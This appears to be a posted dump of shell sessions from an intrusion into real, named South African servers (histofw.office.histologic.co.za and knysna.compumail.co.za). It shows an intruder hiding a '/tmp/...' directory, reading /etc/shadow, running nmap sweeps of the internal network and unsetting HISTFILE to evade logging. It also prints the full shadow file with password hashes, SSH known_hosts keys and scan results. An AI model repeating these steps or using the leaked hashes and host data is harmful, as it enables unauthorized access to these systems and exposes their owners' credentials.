815 vi rules
816 vi /etc/services
817 vi rules
818 shorewall restart
819 tailf -f /var/log/messages
820 tail -f /var/log/messages
821 vi rules
822 shorewall restart
823 vi rules
824 shorewall restart
825 vi rules
826 shorewall restart
827 exit
828 cd /etc/squid/
829 vi msntauth.conf
830 cat msntauth.conf
831 md /usr/local/squid
832 md /usr/local/squid/etc
833 exit
834 tail -f /var/log/messages
835 tail -f /var/log/messages | grep 196.15.249.205
836 ifconfig
837 ssh plet.compumail.co.za
838 telnet plet.compumail.co.za 110
839 telnet lin02.compumail.co.za 110
840 cd /etc/shorewall/
841 vi rules
842 tail -f /var/log/messages
843 exit
844 tail -f /var/log/messages
845 ping 192.168.0.1
846 vi /etc/shorewall/rules
847 tail -f /var/log/messages
848 vi /etc/shorewall/rules
849 shorewall restart
850 tail -f /var/log/messages
851 vi /etc/shorewall/rules
852 cat /var/log/messages
853 vi /etc/shorewall/rules
854 ifconfig
855 vi /etc/shorewall/rules
856 shorewall restart
857 vi /etc/shorewall/rules
858 cd /etc/shorewall/
859 vi policy
860 vi interfaces
861 tail -f /var/log/messages
862 tcpdump
863 tcpdump -ni eth1
864 tcpdump -ni eth0
865 tail -f /var/log/kernel/
866 tail -f /var/log/syslog
867 tail -f /var/log/messages
868 exit
869 locate msnt
870 cd /etc/squid/
871 ll
872 vi msntauth.conf
873 /etc/init.d/named status
874 /etc/init.d/named restart
875 ifcconfig
876 iconfig
877 ifconfig
878 tail -f /var/log/messages
879 clear
880 tail -f /var/log/messages
881 vi /etc/shorewall/rules
882 tail -f /var/log/messages
883 ssh knysna.compumail.co.za
884 ssh plet.compumail.co.za
885 ping plet.copmumail.co.za
886 ping www.mweb.co.za
887 ssh plet.compumail.co.za
888 ping plet.compumail.co.za
889 vi /etc/shorewall/rules
890 exit
891 tail -f /var/log/messages
892 telnet plet.compumail.co.za 110
893 vi /etc/shorewall/rules
894 tail -f /var/log/messages
895 dmesg -c
896 clear
897 tail -f /var/log/messages
898 /etc/init.d/shorewall stop
899 /etc/init.d/shorewall start
900 tail -f /var/log/messages
901 vi /etc/sysctl.conf
902 vi /etc/shorewall/masq
903 ifconfig
904 vi /etc/shorewall/masq
905 ifconfig
906 vi /etc/shorewall/masq
907 cd /etc/shorewall/
908 shorewall restart
909 tail -f /var/log/messages
910 passwd joe
911 tail -f /var/log/messages
912 vi masq
913 shorewall restart
914 exiyt
915 eexit
916 exit
917 ifconfig
918 netstat -rn
919 cd /etc/shorewall/
920 vi masq
921 vi policy
922 vi interfaces
923 vi policy
924 vi rules
925 shorewall restart
926 dmesg -c
927 ifconfig
928 vi /etc/sysctl.conf
929 w
930 uname -a
931 cat /etc/*-release
932 w
933 ls
934 df -h
935 cat .bash_history
936 w
937 irssi
938 BitchX
939 cd /tmp
940 mkdir ...
941 chmod 700 ...
942 cd ...
943 ls
944 wget http://irssi.org/files/irssi-0.8.9.tar.gz
945 ftp ftp.irssi.org
946 exit
947 cd /tmp/...
948 ls
949 tar xzf *
950 cd *
951 ls
952 ./configure && make && make install
953 irssi --help
954 irssi -v
955 opensls
956 openssl
957 ./configure --help | grep ssl
958 grep ssl *
959 cd ..
960 ls
961 ifconfig
962 irssi
######## WHAT THE FUCK!? ###############
963 adduser talon
964 passwd talon
965 su talon
966 userdel talon
967 userdel -r talon
968 rm -rf /home/talon
######## WHAT THE FUCK!? ###############
969 ls
970 rm -rf *
971 w
972 cat ~/.ssh/known_hosts
973 ifconfig
974 nmap
975 ls
976 locate nmap
977 cat /etc/shadow
978 w
979 ls
980 exit
981 cd /tmp/...
982 ls
983 tar xzf *
984 cd *
985 ls
986 clear
987 ./configure && make && make install
988 cd ..
989 rm -rf *
990 nmap
991 clear
992 nmap -sP 192.168.0.1/24
993 clear
994 nmap -sS -sV -p 22 -P0 192.168.0.1/24
995 clear
996 nmap -sS -sV -P0 192.168.0.1/24 -oN nmap.log
997 clear
998 w
999 ls
1000 exit
1001 unset HISTFILE
1002 w
1003 ls -al
1004 history
[root@histofw root]#
[root@histofw root]#
[root@histofw root]#
[root@histofw root]# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 1580 472 ? S 2004 0:03 init [3]
root 2 0.0 0.0 0 0 ? SW 2004 0:00 [migration/0]
root 3 0.0 0.0 0 0 ? SWN 2004 0:00 [ksoftirqd/0]
root 4 0.0 0.0 0 0 ? SW 2004 0:00 [migration/1]
root 5 0.0 0.0 0 0 ? SWN 2004 0:00 [ksoftirqd/1]
root 6 0.0 0.0 0 0 ? SW< 2004 0:00 [events/0]
root 7 0.0 0.0 0 0 ? SW< 2004 0:00 [events/1]
root 8 0.0 0.0 0 0 ? SW< 2004 2:40 [kblockd/0]
root 9 0.0 0.0 0 0 ? SW< 2004 2:38 [kblockd/1]
root 10 0.0 0.0 0 0 ? SW 2004 0:00 [kirqd]
root 13 0.0 0.0 0 0 ? SW 2004 4:06 [kswapd0]
root 14 0.0 0.0 0 0 ? SW< 2004 0:00 [aio/0]
root 15 0.0 0.0 0 0 ? SW< 2004 0:00 [aio/1]
root 17 0.0 0.0 0 0 ? SW 2004 0:00 [kseriod]
root 25 0.0 0.0 0 0 ? SW 2004 0:47 [kjournald]
root 115 0.0 0.3 2040 936 ? S 2004 0:01 devfsd /dev
root 205 0.0 0.0 0 0 ? SW 2004 0:00 [khubd]
root 1936 0.0 0.0 1656 236 ? S 2004 0:00 /sbin/ifplugd -w
root 2010 0.0 0.1 1656 292 ? S 2004 0:00 /sbin/ifplugd -w
root 2086 0.0 0.1 1644 412 ? S 2004 0:13 syslogd -m 0 -a /
root 2094 0.0 0.1 2604 304 ? S 2004 0:05 klogd -2
daemon 2126 0.0 0.1 1620 276 ? S 2004 0:00 /usr/sbin/atd
root 2180 0.0 1.0 2664 2664 ? SL 2004 0:01 ntpd -A
root 2219 0.0 0.1 2172 508 ? S 2004 0:00 xinetd -stayalive
root 2287 0.0 0.1 1632 256 ? S 2004 0:01 crond
root 2307 0.0 0.0 2240 192 ? S 2004 0:00 /usr/sbin/fwlogwa
root 2357 0.0 0.0 5484 244 ? S 2004 0:00 squid -D
squid 2359 0.0 23.8 89264 60496 ? S 2004 22:12 (squid) -D
squid 2369 0.0 0.0 1424 36 ? S 2004 0:00 (unlinkd)
squid 2440 0.0 0.0 2400 160 ? S 2004 1:39 diskd 2415616 241
root 2518 0.0 0.7 11332 2028 ? S 2004 0:03 httpd2 -f /etc/ht
nobody 2609 0.0 0.1 1904 492 ? S 2004 0:01 /usr/local/bin/no
root 2615 0.0 0.0 1576 128 tty1 S 2004 0:00 /sbin/mingetty tt
root 2616 0.0 0.1 1576 308 tty2 S 2004 0:00 /sbin/mingetty tt
root 2617 0.0 0.0 1576 124 tty3 S 2004 0:00 /sbin/mingetty tt
root 2618 0.0 0.0 1576 124 tty4 S 2004 0:00 /sbin/mingetty tt
root 2619 0.0 0.0 1576 120 tty5 S 2004 0:00 /sbin/mingetty tt
root 2620 0.0 0.0 1576 136 tty6 S 2004 0:00 /sbin/mingetty tt
root 20328 0.0 0.2 4032 516 ? S Jun01 0:00 /usr/bin/perl /us
apache 20381 0.0 1.2 11412 3116 ? S Jun01 0:00 httpd2 -f /etc/ht
apache 20382 0.0 1.1 11560 2944 ? S Jun01 0:00 httpd2 -f /etc/ht
apache 20383 0.0 1.5 11560 3816 ? S Jun01 0:00 httpd2 -f /etc/ht
apache 20384 0.0 0.8 11412 2188 ? S Jun01 0:00 httpd2 -f /etc/ht
apache 20385 0.0 0.7 11412 1976 ? S Jun01 0:00 httpd2 -f /etc/ht
root 1968 0.0 0.0 0 0 ? SW Jun06 0:00 [pdflush]
named 9497 0.0 1.2 38792 3176 ? S Jun07 0:00 named -u named
squid 17543 0.0 0.2 2104 616 ? S Jun12 0:00 (msnt_auth)
squid 17547 0.0 0.2 2104 536 ? S Jun12 0:00 (msnt_auth)
squid 17549 0.0 0.2 2104 532 ? S Jun12 0:00 (msnt_auth)
squid 17550 0.0 0.2 2104 532 ? S Jun12 0:00 (msnt_auth)
squid 17551 0.0 0.2 2104 536 ? S Jun12 0:00 (msnt_auth)
apache 7468 0.0 1.2 11412 3224 ? S Jun12 0:00 httpd2 -f /etc/ht
apache 7469 0.0 1.2 11412 3224 ? S Jun12 0:00 httpd2 -f /etc/ht
apache 7470 0.0 1.2 11412 3224 ? S Jun12 0:00 httpd2 -f /etc/ht
root 20821 0.0 0.0 0 0 ? SW 04:36 0:00 [pdflush]
root 27630 0.0 0.5 3336 1424 ? S 05:43 0:00 /usr/sbin/sshd
root 27946 0.0 0.6 6052 1712 ? S 07:30 0:00 sshd: root@pts/0
root 27948 0.0 0.6 2780 1624 pts0 S 07:30 0:00 -bash
root 28001 0.0 0.3 2424 784 pts0 R 07:36 0:00 ps aux
[root@histofw root]# ls -al //home/
total 12
drwxr-xr-x 3 root root 4096 Jun 12 05:27 ./
drwxr-xr-x 18 root adm 4096 Nov 25 2004 ../
drwx--x--x 3 joe joe 4096 Jun 10 13:18 joe/
[root@histofw root]# host
Usage: host [-aCdlrTwv] [-c class] [-n] [-N ndots] [-t type] [-W time]
[-R number] hostname [server]
-a is equivalent to -v -t *
-c specifies query class for non-IN data
-C compares SOA records on authoritative nameservers
-d is equivalent to -v
-l lists all hosts in a domain, using AXFR
-i Use the old IN6.INT form of IPv6 reverse lookup
-N changes the number of dots allowed before root lookup is done
-r disables recursive processing
-R specifies number of retries for UDP packets
-t specifies the query type
-T enables TCP/IP mode
-v enables verbose output
-F Don't get next server when the first one got a SERVFAIL
-w specifies to wait forever for a reply
-W specifies how long to wait for a reply
[root@histofw root]# hostname
histofw.office.histologic.co.za
[root@histofw root]# cat /root/.ssh/known_hosts
knysna.compumail.co.za,196.15.249.203 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAzIEVgzYxi0gw7M8wAmcNVKU3OedR13O+Bwq7EAJr2FznpiLi2xlRA3VMjdzphZCItWIR0gd48haQgYM8km7DSYkeOTnjBrD4VaRKdJf9ifdXPMVsdiKqhps1qYDn3futnYb/EcVOywHc+KqtxqY6gZT0XP8S+MOHfVqRW+ZWUA8=
196.7.8.54 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA93RWm8edFeHPLLNTH4NOz9QqvyvIjzWP9FcJbO1H6egi+Tp4HBHqENX2vzaKIzMRjQvcDiIcQReAaXxN+1uvgj2EGYT5xIyEj+OzlykvNLoBoYvPaGw6t/b4rK5SKCAKmABOaFUowLr/WyY3js3oaXX74Fmkc+tDN70Pbw8fPbs=
196.15.249.205 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA6dGqZ8KfL4m3cxsAHQ3UnkRnWnNarGzSg/kGiRr00bdw8+N1NAl3j1efvXPHuI1TFgiNtVHEwz4hnN19F6pHVmKT/YIk/rN8cooQo/df0pk7k24mfrdwRyrV8K/xIGnXoEy4qPfe3hFl9TB5LdOPgMsy8WaYafJsF3yoZR+/9Ns=
196.25.45.214 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAyUnEgWb1cXlMwr994ml+cCjbVDvQ8mqG6kfRBNTSPIazyD40FrYTt5lxp6eihjRCdMhyXbkZ/AH5C7/utzD2p0xcF+/h0mM0sYFQS+laQidFU66G7AT9jZCty+tcGBwYIZZOq6ZgurSB4d20e5BpA2SquiJmBEgahB3LT6axtHE=
plet.compumail.co.za,196.15.249.204 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA1GGPVqpEtReFznRbCophK4JL0CPfLwJK0CejbXkoYxR+Wfqog3B6c5z405XmHnoQ1Qwdd1zoFaxT9Our5ofqyGRgNas5knuweIHivMZdKGK+WsIS0r5iyWwsr3+J1SXOywOO0fHz27eVlItLSjAblEyzKkYH/V8KNU15MpZPSYs=
127.0.0.1 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAwmaXcYfjdIrrZVxzBHLc0C0nWqBEHX4APDdh0oVz6q6pCjWYcn3EJ4HGYWxdqWKfd3tQ6A7qNpJoL8U8nOtOPSEpfKjfolUYbVdFUcey66RHSS7qzZ/QVt1Fj5CBok2VMLSppqNqIAJPsmiUWF0x6KfAnEqTvSAjwbY/3xLKdMM=
[root@histofw root]# ls -al /tmp/.../
total 16
drwx------ 2 root root 4096 Jun 12 06:03 ./
drwxrwxrwt 6 root root 4096 Jun 14 05:14 ../
-rw-r--r-- 1 root root 5595 Jun 12 14:30 nmap.log
[root@histofw root]# cat /tmp/.../nmap.log
# nmap 3.81 scan initiated Sun Jun 12 06:03:16 2005 as: nmap -sS -sV -P0 -oN nmap.log
192.168.0.1/24
All 1663 scanned ports on 192.168.0.0 are: filtered
All 1663 scanned ports on server1.office.histologic.co.za (192.168.0.1) are: filtered
MAC Address: 00:D0:B7:B7:AE:1B (Intel)
All 1663 scanned ports on 192.168.0.2 are: filtered
All 1663 scanned ports on 192.168.0.3 are: filtered
All 1663 scanned ports on 192.168.0.4 are: filtered
All 1663 scanned ports on 192.168.0.5 are: filtered
All 1663 scanned ports on 192.168.0.6 are: filtered
All 1663 scanned ports on 192.168.0.7 are: filtered
All 1663 scanned ports on 192.168.0.8 are: filtered
All 1663 scanned ports on 192.168.0.9 are: filtered
Interesting ports on histofw.office.histologic.co.za (192.168.0.10):
(The 1657 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.6.1p2 (protocol 1.99)
53/tcp open domain ISC Bind 9.2.3
80/tcp open http Apache Advanced Extranet Server httpd 2.0.48
110/tcp open pop3 UW Imap pop3 server 2003.83mdk
443/tcp open ssl/http Apache Advanced Extranet Server httpd 2.0.48
3128/tcp open http-proxy Squid webproxy 2.5.STABLE4
All 1663 scanned ports on 192.168.0.11 are: filtered
All 1663 scanned ports on 192.168.0.12 are: filtered
All 1663 scanned ports on 192.168.0.13 are: filtered
All 1663 scanned ports on 192.168.0.14 are: filtered
All 1663 scanned ports on 192.168.0.15 are: filtered
All 1663 scanned ports on 192.168.0.16 are: filtered
All 1663 scanned ports on 192.168.0.17 are: filtered
All 1663 scanned ports on 192.168.0.18 are: filtered
All 1663 scanned ports on 192.168.0.19 are: filtered
All 1663 scanned ports on 192.168.0.20 are: filtered
All 1663 scanned ports on 192.168.0.21 are: filtered
All 1663 scanned ports on 192.168.0.22 are: filtered
All 1663 scanned ports on 192.168.0.23 are: filtered
All 1663 scanned ports on 192.168.0.24 are: filtered
All 1663 scanned ports on 192.168.0.25 are: filtered
All 1663 scanned ports on 192.168.0.26 are: filtered
All 1663 scanned ports on 192.168.0.27 are: filtered
All 1663 scanned ports on 192.168.0.28 are: filtered
All 1663 scanned ports on 192.168.0.29 are: filtered
All 1663 scanned ports on 192.168.0.30 are: filtered
All 1663 scanned ports on 192.168.0.31 are: filtered
All 1663 scanned ports on 192.168.0.32 are: filtered
All 1663 scanned ports on 192.168.0.33 are: filtered
All 1663 scanned ports on 192.168.0.34 are: filtered
All 1663 scanned ports on 192.168.0.35 are: filtered
All 1663 scanned ports on 192.168.0.36 are: filtered
All 1663 scanned ports on 192.168.0.37 are: filtered
All 1663 scanned ports on 192.168.0.38 are: filtered
All 1663 scanned ports on 192.168.0.39 are: filtered
All 1663 scanned ports on 192.168.0.40 are: filtered
All 1663 scanned ports on 192.168.0.41 are: filtered
All 1663 scanned ports on 192.168.0.42 are: filtered
All 1663 scanned ports on 192.168.0.43 are: filtered
All 1663 scanned ports on 192.168.0.44 are: filtered
All 1663 scanned ports on 192.168.0.45 are: filtered
All 1663 scanned ports on 192.168.0.46 are: filtered
MAC Address: 00:0F:20:23:0E:30 (Hewlett Packard)
All 1663 scanned ports on 192.168.0.47 are: filtered
All 1663 scanned ports on 192.168.0.48 are: filtered
All 1663 scanned ports on 192.168.0.49 are: filtered
All 1663 scanned ports on 192.168.0.50 are: filtered
All 1663 scanned ports on 192.168.0.51 are: filtered
All 1663 scanned ports on 192.168.0.52 are: filtered
All 1663 scanned ports on 192.168.0.53 are: filtered
All 1663 scanned ports on 192.168.0.54 are: filtered
All 1663 scanned ports on 192.168.0.55 are: filtered
All 1663 scanned ports on 192.168.0.56 are: filtered
All 1663 scanned ports on 192.168.0.57 are: filtered
All 1663 scanned ports on 192.168.0.58 are: filtered
All 1663 scanned ports on 192.168.0.59 are: filtered
All 1663 scanned ports on 192.168.0.60 are: filtered
All 1663 scanned ports on 192.168.0.61 are: filtered
All 1663 scanned ports on 192.168.0.62 are: filtered
All 1663 scanned ports on 192.168.0.63 are: filtered
All 1663 scanned ports on 192.168.0.64 are: filtered
All 1663 scanned ports on 192.168.0.65 are: filtered
All 1663 scanned ports on 192.168.0.66 are: filtered
All 1663 scanned ports on 192.168.0.67 are: filtered
All 1663 scanned ports on 192.168.0.68 are: filtered
All 1663 scanned ports on 192.168.0.69 are: filtered
All 1663 scanned ports on 192.168.0.70 are: filtered
All 1663 scanned ports on 192.168.0.71 are: filtered
All 1663 scanned ports on 192.168.0.72 are: filtered
All 1663 scanned ports on 192.168.0.73 are: filtered
All 1663 scanned ports on 192.168.0.74 are: filtered
All 1663 scanned ports on 192.168.0.75 are: filtered
All 1663 scanned ports on 192.168.0.76 are: filtered
All 1663 scanned ports on 192.168.0.77 are: filtered
All 1663 scanned ports on 192.168.0.78 are: filtered
All 1663 scanned ports on 192.168.0.79 are: filtered
All 1663 scanned ports on 192.168.0.80 are: filtered
All 1663 scanned ports on 192.168.0.81 are: filtered
All 1663 scanned ports on 192.168.0.82 are: filtered
All 1663 scanned ports on 192.168.0.83 are: filtered
All 1663 scanned ports on 192.168.0.84 are: filtered
All 1663 scanned ports on 192.168.0.85 are: filtered
All 1663 scanned ports on 192.168.0.86 are: filtered
All 1663 scanned ports on 192.168.0.87 are: filtered
All 1663 scanned ports on 192.168.0.88 are: filtered
All 1663 scanned ports on 192.168.0.89 are: filtered
All 1663 scanned ports on 192.168.0.90 are: filtered
[root@histofw root]# ls -al /var/tmp/
total 12
drwxrwxrwt 3 root root 4096 Jun 14 04:07 ./
drwxr-xr-x 21 root root 4096 May 12 2004 ../
drwx------ 4 root root 4096 May 13 2004 kdecache-root/
[root@histofw run]#
[root@histofw run]# cd /home/joe/
[root@histofw joe]# ls -al
total 36
drwx--x--x 3 joe joe 4096 Jun 10 13:18 ./
drwxr-xr-x 3 root root 4096 Jun 12 05:27 ../
-rw------- 1 joe joe 3 Jun 10 13:18 .bash_history
-rw-r--r-- 1 joe joe 24 May 12 2004 .bash_logout
-rw-r--r-- 1 joe joe 191 May 12 2004 .bash_profile
-rw-r--r-- 1 joe joe 124 May 12 2004 .bashrc
-rw-r--r-- 1 joe joe 141 May 12 2004 .mailcap
-rw-r--r-- 1 joe joe 3729 May 12 2004 .screenrc
drwx------ 2 joe joe 4096 May 12 2004 tmp/
[root@histofw joe]# cat .bash_history
su
[root@histofw joe]# cat /etc/shadow
root:$1$HPUKC/y.$hRGN2fb/eqR/yW1QrKbPi1:12751:0:99999:7:::
bin:*:12550:0:99999:7:::
daemon:*:12550:0:99999:7:::
adm:*:12550:0:99999:7:::
lp:*:12550:0:99999:7:::
sync:*:12550:0:99999:7:::
shutdown:*:12550:0:99999:7:::
halt:*:12550:0:99999:7:::
mail:*:12550:0:99999:7:::
news:*:12550:0:99999:7:::
uucp:*:12550:0:99999:7:::
operator:*:12550:0:99999:7:::
games:*:12550:0:99999:7:::
nobody:*:12550:0:99999:7:::
rpm:!!:12550:0:99999:7:::
vcsa:!!:12550:0:99999:7:::
rpc:!!:12550:0:99999:7:::
xfs:!!:12550:0:99999:7:::
postfix:!!:12550:0:99999:7:::
apache:!!:12550:0:99999:7:::
sshd:!!:12550:0:99999:7:::
ftp:!!:12550:0:99999:7:::
squid:!!:12550:0:99999:7:::
joe:$1$YXpZu0Us$UQvcnUa9dAzRd58GE4u1O/:12944:0:99999:7:::
named:!!:12550:0:99999:7:::
------------------------------------
skew @ knysna: absolutely nothing here just some lame hacking attempts it seems.
------------------------------------
login as: root
root@knysna.compumail.co.za's password:
Last login: Tue Jun 14 01:42:21 2005 from dsl-5-37.sg-b.tiscali.no
[root@knysna root]# w
06:49:22 up 63 days, 14:35, 2 users, load average: 0.09, 0.03, 0.00
USER TTY LOGIN@ IDLE JCPU PCPU WHAT
root vc/1 01Jun05 5days 0.03s 0.03s -bash
root pts/0 Mon09 18:39m 0.03s 0.03s -bash
[root@knysna root]# uname unset HISTFILE
[root@knysna root]# uname -a ; cat /etc/issue
Linux knysna 2.6.3-7mdk-p3-smp-64GB #1 SMP Wed Mar 17 15:34:39 CET 2004 i686 unknown
unknown GNU/Linux
Mandrake Linux release 10.0 (Official) for i586
Kernel 2.6.3-7mdk-p3-smp-64GB on a Dual-processor i686 / \l
[root@knysna root]# history
4 dig www.anchorrand.com
5 exit
6 bwm
7 exit
8 bwm
9 tcpdump -ni wp7aft
10 exit
11 bwm
12 wanrouter status
13 bwm
14 exit
15 ping www.logisticor.com
16 dig www.logisticor.com @196.25.1.1
17 dig www.logisticor.com @196.25.1.11
18 dig www.logisticor.com @induna.saix.net
19 dig www.logisticor.com @igubu.saix.net
20 /etc/init.d/named
21 /etc/init.d/named restart
22 dig www.logisticor.com @196.15.249.203
23 dig www.logisticor.com @196.15.249.204
24 exit
25 dig www.logisticor.com @196.15.249.204
26 dig www.logisticor.com @196.15.249.203
27 dig www.logisticor.com @192.168.20.2
28 dig logisticor.com @192.168.20.2
29 dig www.logisticor.com @192.168.20.2
30 dig www.logisticor.com @196.15.249.204
31 dig www.logisticor.com @induna.saix.net
32 exit
33 bwm
34 exit
35 dmesg | grep 196.25.45.221
36 dmesg -c
37 clear
38 tail -f /var/log/messages
39 tail -f /var/log/messages | grep 196.25.45.221
40 route
41 route add -net 196.25.45.220 netmask 25.255.255.252 gw 196.15.249.205
42 route add -net 196.25.45.220 netmask 255.255.255.252 gw 196.15.249.205
43 route
44 exit
45 cat /etc/services | grep https
46 exit
47 vi /etc/in
48 vi /var/named/
49 vi /var/named/logisticor.com
50 rndc reload
51 dig ftp.logisticor.com
52 ping ftp.logisticor.com
53 vi /var/named/logisticor.com
54 rndc reload
55 ping ftp.logisticor.com
56 dig ftp.logisticor.com
57 vi /var/named/logisticor.com
58 rndc reload
59 dig ftp.logisticor.com
60 ping ftp.logisticor.com
61 exit
62 dig www.logisticor.com
63 cd /var/named/
64 ls
65 vi logisticor.com
66 rcdc reload
67 rndc reload
68 dig www.logisticor.com\
69 dig www.logisticor.com
70 /etc/init.d/named restart
71 dig www.logisticor.com
72 vi namerd
73 vi named.
74 vi logisticor.com
75 dig www.logisticor.com
76 cd /var/named/
77 vi compumail.co.za
78 ll
79 dig alltransportneeds.co.za
80 dig atn.co.za
81 dig atn.com
82 exit
83 vi /var/named/parktonian.co.za
84 rndc reload parktonian.co.za
85 dig www.parktonian.co.za
86 exit
87 bwm
88 exit
89 cd /var/named/
90 cat gea-westfalia.co.za
91 vi gea-westfalia.co.za
92 rncd reload gea-westfalia.co.za
93 rndc reload gea-westfalia.co.za
94 dig gea-westfalia.co.za
95 vi gea-westfalia.co.za
96 exit
97 cd /var/named/
98 ls
99 vi logisticor.com
100 rndc reload
101 dig www.logisticor.com
102 ping www.logisticor.com
103 dig www.logisticor.com
104 vi logisticor.com
105 /etc/init.d/named resatrt
106 /etc/init.d/named resatart
107 /etc/init.d/named restart
108 dig www.logisticor.com\
109 dig www.logisticor.com
110 dig logisticor.com
111 dig www.logisticor.com
112 ping web01.compumail.co.za
113 vi logisticor.com
114 /etc/init.d/named resatart
115 /etc/init.d/named restart
116 rndc reload
117 dig www.logisticor.com
118 exit
119 cd /etc/sysconfig/network-scripts/
120 ll
121 vi ifcfg-eth0
122 ll
123 ifconfig
124 exit
125 ifconfig | more
126 exit
127 bwm
128 tcpdump -ni wp7aft
129 tcpdump -i wp7aft
130 exit
131 bwm
132 ssh 196.15.249.254
133 bwm
134 dig mail.tiscpty.com
135 cd /var/named/
136 vi khuphukani.co.za
137 passwd kh_info
138 vi khuphukani.co.za
139 rndc reload
140 /etc/init.d/named resatrt
141 /etc/init.d/named restart
142 exit
143 ssh joe@165.146.35.51
144 ssh parktonian.no-ip.info
145 exit
146 cd /var/named/
147 vi geospace.co.za
148 rndc reload geospace.co.za
149 exit
150 ifconfig
151 ssh joe@196.25.45.246
152 ifconfig
153 bwm
154 ssh 196.25.45.234
155 ssh 196.25.29.178
156 grep /var/log/httpd/access_log
157 more /var/log/httpd/access_log
158 more /var/log/httpd/error_log
159 exit
160 vi /etc/named.conf
161 exit
162 cd /var/named/
163 vi ibe.co.za
164 cat candnhose.com
165 vi ibe.co.za
166 cat candnhose.com
167 vi ibe.co.za
168 rndc reload ibe.co.za
169 exit
170 bwm
171 exit
172 vi /var/named/delvenco.co.za
173 rndc reload delvenco.co.za
174 dig mobile.delvenco.co.za
175 xit
176 exit
177 bwm
178 ifconfig wp11aft
179 ssh joe@196.25.45.246
180 exit
181 ssh mail.delvenco.co.za
182 ssh mobile.delvenco.co.za
183 exit
184 vi /var/named/delvenco.co.za
185 telnet mobile.delvenco.co.za 25
186 rndc reload
187 rndc reload delvenco.co.za
188 cd /var/named/
189 vi onestar.co.za
190 vi liberne.co.za
191 vi webz-r-us.co.za
192 rndc reload onestar.co.za
193 rndc reload liberne.co.za
194 rndc reload webz-r-us.co.za
195 dig onestar.co.za mx
196 dig liberne.co.za mx
197 ssh 196.15.249.204
198 exit
199 ssh plet.compumail.co.za
200 exit
201 ssh berner.no-ip.info
202 ssh joe@berner.no-ip.info
203 cat /var/named/logisticor.com
204 vi /var/named/logisticor.com
205 rndc reload logisticor.com
206 ll /var/named/
207 exit
208 ssh lin02.compumail.co.za
209 exit
210 ssh 196.25.45.234
211 ssh plet
212 bwm
213 ssh plet.compumail.co.za
214 exit
215 ll
216 exit
217 vi /etc/named.conf
218 rm -fr /var/named/pakmatic.co.za
219 rndc reload
220 exit
221 ssh parktonian.no-ip.info
222 parktonian.no-ip.info
223 ping parktonian.no-ip.info
224 ssh parktonian.no-ip.info
225 exit
226 bwm
227 exit
228 vi /var/
229 cd /var
230 ls
231 cd ..
232 locate named
233 cd /var/man
234 cd /var/named/
235 ls
236 vi tiscpty.com
237 rndc reload tiscpty.com
238 dig tiscpty.com mx
239 dig mail.tiscpty.com
240 dig mail.tiscpty.com @196.15.249.203
241 dig mail.tiscpty.com @196.15.249.204
242 dig mail.tiscpty.com @196.15.249.203
243 dig mail.tiscpty.com @196.15.249.204
244 dig mail.tiscpty.com @196.15.249.203
245 /etc/init.d/named restart
246 dig mail.tiscpty.com @196.15.249.203
247 dig mail.tiscpty.com @196.15.249.204
248 dig mail.tiscpty.com
249 /etc/init.d/named start
250 /etc/init.d/named restart
251 dig mail.tiscpty.com
252 dig mail.tiscpty.com @196.15.249.204
253 dig mail.tiscpty.com @196.15.249.203
254 ifconfig
255 dig mail.tiscpty.com @196.15.249.203
256 vi /var/named/
257 vi /var/named/tiscpty.com
258 rndc reload
259 dig mail.tiscpty.com @196.15.249.204
260 dig mail.tiscpty.com @196.15.249.203
261 vi tiscpty.com
262 vi acetron.co.za
263 vi tiscpty.com
264 rndc reload
265 dig mail.tiscpty.com @196.15.249.203
266 dig tiscpty.com @196.15.249.203
267 dig tiscpty.com mx @196.15.249.203
268 dig tiscpty.com mx @196.15.249.204
269 dig tiscpty.com @196.15.249.204
270 dig tiscpty.com @196.15.249.203
271 vi tiscpty
272 vi tiscpty.com
273 vi acetron.co.za
274 vi tiscpty.com
275 rndc reload
276 dig tiscpty.com @196.15.249.203
277 dig tiscpty.com mx
278 dig mail.tiscpty.com
279 vi thehouses.co.za
280 exit
281 cd /var/named/
282 ls
283 vi nestlife.co.za
284 rndc reload
285 vi nestlife.co.za
286 vi nestlife.co.za
287 vi knowres.co.za
288 vi nestlife.co.za
289 vi knowres.co.za
290 vi nestlife.co.za
291 rndc reload
292 cd /var/named/
293 vi nestlife.co.za
294 dig nestlife.co.za mx
295 dig nestlife.co.za
296 dig mail.nestlife.co.za
297 dig www.nestlife.co.za
298 vi nestlife.co.za
299 dig www.nestlife.co.za
300 vi nestlife.co.za
301 rndc reload
302 dig pop.netl
303 dig pop.nestlife.co.za
304 ssh plet.compumail.co.za
305 ls
306 ifconfig
307 ssh 196.25.45.254
308 wbm
309 bwm
310 exit
311 vi /var/named/geospace.co.za
312 rndc reload geospace.co.za
313 vi /var/named/geospace.co.za
314 rndc reload geospace.co.za
315 dig geospace.co.za
316 dig www.geospace.co.za
317 dig geospace.co.za
318 vi /var/named/geospace.co.za
319 rndc reload geospace.co.za
320 dig geospace.co.za
321 view /var/log/mail/info
322 view /var/log/messages
323 vi /var/named/geospace.co.za
324 rndc reload geospace.co.za
325 view /var/log/messages
326 tail -f /var/log/messages
327 vi /var/named/motocomp.co.za
328 tail -f /var/log/messages
329 dig geospace.co.za @co.za
330 dig geospace.co.za ns @co.za
331 exit
332 dig geospace.co.za
333 rndc reload
334 dig geospace.co.za
335 vi /var/named/geospace.co.za
336 rndc reload
337 vi /var/named/nestlife.co.za
338 rndc reload
339 vi /var/named/nestlife.co.za
340 rndc reload
341 cd /var/named/
342 vi geospace.
343 vi geospace.co.za
344 rndc reload geospace.co.za
345 dig geospace.co.za
346 dig geospace.co.za @127.0.0.1
347 dig geospace.co.za
348 rndc reload
349 vi geospace.co.za
350 rndc reload
351 exit
352 tail -f /var/log/messages
353 exit
354 cd /var/named/
355 ll geospace.co.za
356 vi geospace.aero
357 vi geospace.co.za
358 rndc reload geospace.co.za
359 di gwww.geospace.co.za
360 dig gwww.geospace.co.za
361 dig www.geospace.co.za
362 rndc reload
363 vi /var/named/geospace.co.za
364 rndc reload geospace.co.za
365 exit
366 tail -f /var/log/messages | grep 192.168.20.23
367 exit
